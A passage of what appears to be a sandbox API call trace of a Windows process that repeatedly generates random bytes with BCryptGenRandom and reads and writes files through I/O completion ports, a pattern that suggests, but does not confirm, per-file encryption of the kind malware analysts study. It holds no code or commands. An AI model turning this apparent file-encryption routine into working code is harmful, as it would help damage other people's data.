(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.232] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.232] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.232] free (_Block=0x77d800) [0081.232] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.232] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.232] free (_Block=0x1ff1930) [0081.232] free (_Block=0x1ff1a40) [0081.232] free (_Block=0x77d908) [0081.232] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.233] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.252] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.253] CloseHandle (hObject=0x3c4) returned 1 [0081.264] free (_Block=0x1fb18c0) [0081.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.275] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.275] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.275] free (_Block=0x77d800) [0081.275] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.275] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.275] free (_Block=0x1ff1930) [0081.275] free (_Block=0x1ff1a40) [0081.275] free (_Block=0x77d908) [0081.275] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.276] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.292] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xf2f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.292] CloseHandle (hObject=0x3c4) returned 1 [0081.296] free (_Block=0x1fb18c0) [0081.296] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.304] CloseHandle (hObject=0x3b4) returned 1 [0081.304] free (_Block=0x3df0008) [0081.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.318] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.319] CloseHandle (hObject=0x3b4) returned 1 [0081.320] free (_Block=0x1fb18c0) [0081.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.323] CloseHandle (hObject=0x3b4) returned 1 [0081.323] free (_Block=0x1fb18c0) [0081.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.384] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.384] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.384] free (_Block=0x77d800) [0081.384] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.384] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.384] free (_Block=0x1ff1930) [0081.384] free (_Block=0x1ff1a40) [0081.384] free (_Block=0x77d908) [0081.384] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.385] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.400] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x191f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.402] CloseHandle (hObject=0x3b4) returned 1 [0081.404] free (_Block=0x1fb18c0) [0081.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.415] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.416] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.416] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.416] free (_Block=0x77d800) [0081.416] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.416] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.416] free (_Block=0x1ff1930) [0081.416] free (_Block=0x1ff1a40) [0081.416] free (_Block=0x77d908) [0081.416] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.417] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.418] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x5ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.422] CloseHandle (hObject=0x3b4) returned 1 [0081.422] free (_Block=0x1fb18c0) [0081.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.434] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.434] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.435] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.435] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.435] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.435] free (_Block=0x77d800) [0081.435] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.435] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.436] free (_Block=0x1ff1930) [0081.436] free (_Block=0x1ff1a40) [0081.436] free (_Block=0x77d908) [0081.436] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.437] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.675] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.676] CloseHandle (hObject=0x3b4) returned 1 [0081.677] free (_Block=0x1fb18c0) [0081.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.693] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.693] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.693] free (_Block=0x77d800) [0081.693] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.694] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.694] free (_Block=0x1ff1930) [0081.694] free (_Block=0x1ff1a40) [0081.694] free (_Block=0x77d908) [0081.694] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.696] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.714] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.715] CloseHandle (hObject=0x3b4) returned 1 [0081.720] free (_Block=0x1fb18c0) [0081.720] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.733] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.733] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.733] free (_Block=0x77d800) [0081.733] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.733] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.734] free (_Block=0x1ff1930) [0081.734] free (_Block=0x1ff1a40) [0081.734] free (_Block=0x77d908) [0081.734] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.735] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.751] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.751] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.752] CloseHandle (hObject=0x3b4) returned 1 [0081.756] free (_Block=0x1fb18c0) [0081.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.880] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.886] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.886] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.886] free (_Block=0x77d800) [0081.886] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.886] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.887] free (_Block=0x1ff1930) [0081.887] free (_Block=0x1ff1a40) [0081.887] free (_Block=0x77d908) [0081.887] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.907] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.907] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.907] free (_Block=0x77d800) [0081.907] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.908] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.908] free (_Block=0x1ff1930) [0081.908] free (_Block=0x1ff1a40) [0081.908] free (_Block=0x77d908) [0081.908] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0081.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0081.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0081.922] calloc (_Count=0x40, 